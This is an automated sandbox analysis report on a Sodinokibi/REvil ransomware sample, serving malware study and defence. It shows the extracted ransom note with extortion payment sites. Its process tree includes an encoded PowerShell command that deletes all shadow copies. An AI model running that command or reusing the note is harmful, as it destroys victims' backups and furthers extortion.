Resubmissions

14-09-2021 08:49

210914-krgqssfdd9 10

13-09-2021 13:07

210913-qcw5tsggfk 10

Analysis

  • max time kernel
    1618s
  • max time network
    1802s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    14-09-2021 08:49

General

  • Target

    21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe

  • Size

    165KB

  • MD5

    fad3cd9094f43e48c8e5061aeb2d76ed

  • SHA1

    cdeb9d27b479ecd25e0ebcda4cfdcff8b969470b

  • SHA256

    21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3

  • SHA512

    9063789eab4ea880199791d5f66196b513bdb206991e22e7a991dbc47ffb0aa837e1452de7440985adb7f35e38b6ab7d15ebfce64e1ac2e2c91545876326e015

Malware Config

Extracted

Path

C:\ultj009_Wannadie.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension ultj009. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F141245511FBA0A0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F141245511FBA0A0 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: 9ogg/Y0PmJZ+P3zvcusVynpNBNxk8Ka1NRWOjV5PlqSBAC05be9z2h083PFiFcmo KxuSCnjvXUHxuh72saskMInj6feI2sbUnhS9U4lGJqXS+Ug9WDY271ZgBDdJlOFg FpcoNRr8KONBvwwUQ39hmyFVKFiOi6Jo+AavOv/HAZzlWAdtGYtecp9/Q5Ti4j6X ZTNGF0xk+/t/oxlVJmnz9eHwnAtZIVloguNJBMCxPA58tG3GyjGXXlnawJkvueM3 XKw6pelYdCqMnBCFydpG7jUUQB3PFN+UH3zIuxveZTE/CbbpFdkPcp33s7z/5Zhk 7WhBhYixOteeXDOGMUTCf4kx+EirAQS1/c8p9VTpmQUTC/nmT81+5mibJHs7+qOa BM++vJ345Y8LRolhKFCRDSTODfMMGiedLrHQ0NqOFhriew3/NgmLv/zQhnHbeJp7 sHlAxLG27C1HFecuqrWU2ijcYFDWqhBAMhlw5xMx+SNjFKuRO1NNZznOiTmoNxmD ml0hKapcC0/X609uJxD9JGezD3f2liC2YDR+2jdgC0BFAgJ/IOddrfrygUl0Rbjn UHXPKReKaVu+eg9nbzWheCYDf8gmTGUM95nkP0s8aA7lpRrI/LAnJw/FMzHjjHrg Ww1ABw0+DFCPU5l8Yb6vCU/uG6BbVLfWtwtuXNBP+zw7vxdEOWynXm6CDyWlxxl5 BuZs9io1FOIu9nTMbVnazdM5Qzq+IRRx4etuDfhu3tiObQRiIp3S+CWkpT8hiz/Y 90sqhiG13ZViogw1ARw11c718wE1dst3wqJP4N6B4U+oRXfiV5noA14xe11UwyIs 7zlYMmadO3hxqFw8rWDeLfx23AcUbzMmyyZ8mpWuZIX4RIluRRxJsnh04Y7/RZJv 4rcqggKhcKAEocVCZymwFaiV1wjiKCOVfnpDYKyWU7IGz7sjil1pshwjPWOyxL52 jNuBa1j7u+B+7P49iTRVJNQ+zBMKe87F2t7Z6nDYg7ITjJXeZaw5w6r4Kbylee4k ChecbbrPKESERGjFsmnmJLjGSJ1J9vNc8+bP3VS9kxa6BfSPihY+XtbGPep2I/2K 7aYJjIfgh/XG6skErtr9uNDYe3jKqzFyI35LpK6qGC9o27irilpghHwgVMW+7cFk i5jicQDoAg/6hICZVVU= Extension name: ultj009 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F141245511FBA0A0

http://decryptor.top/F141245511FBA0A0

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\21eb941fd24bc9c0edf92a82b351ad8643c8291ab95b03c12735e1c5c06261a3.bin.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:788
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1972

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/552-54-0x0000000000000000-mapping.dmp
  • memory/552-55-0x000007FEFBC21000-0x000007FEFBC23000-memory.dmp
    Filesize: 8KB
  • memory/552-56-0x000007FEF2DC0000-0x000007FEF391D000-memory.dmp
    Filesize: 11.4MB
  • memory/552-57-0x0000000002320000-0x0000000002322000-memory.dmp
    Filesize: 8KB
  • memory/552-59-0x0000000002322000-0x0000000002324000-memory.dmp
    Filesize: 8KB
  • memory/552-58-0x000000000232B000-0x000000000234A000-memory.dmp
    Filesize: 124KB
  • memory/552-60-0x0000000002324000-0x0000000002327000-memory.dmp
    Filesize: 12KB
  • memory/2044-53-0x0000000076391000-0x0000000076393000-memory.dmp
    Filesize: 8KB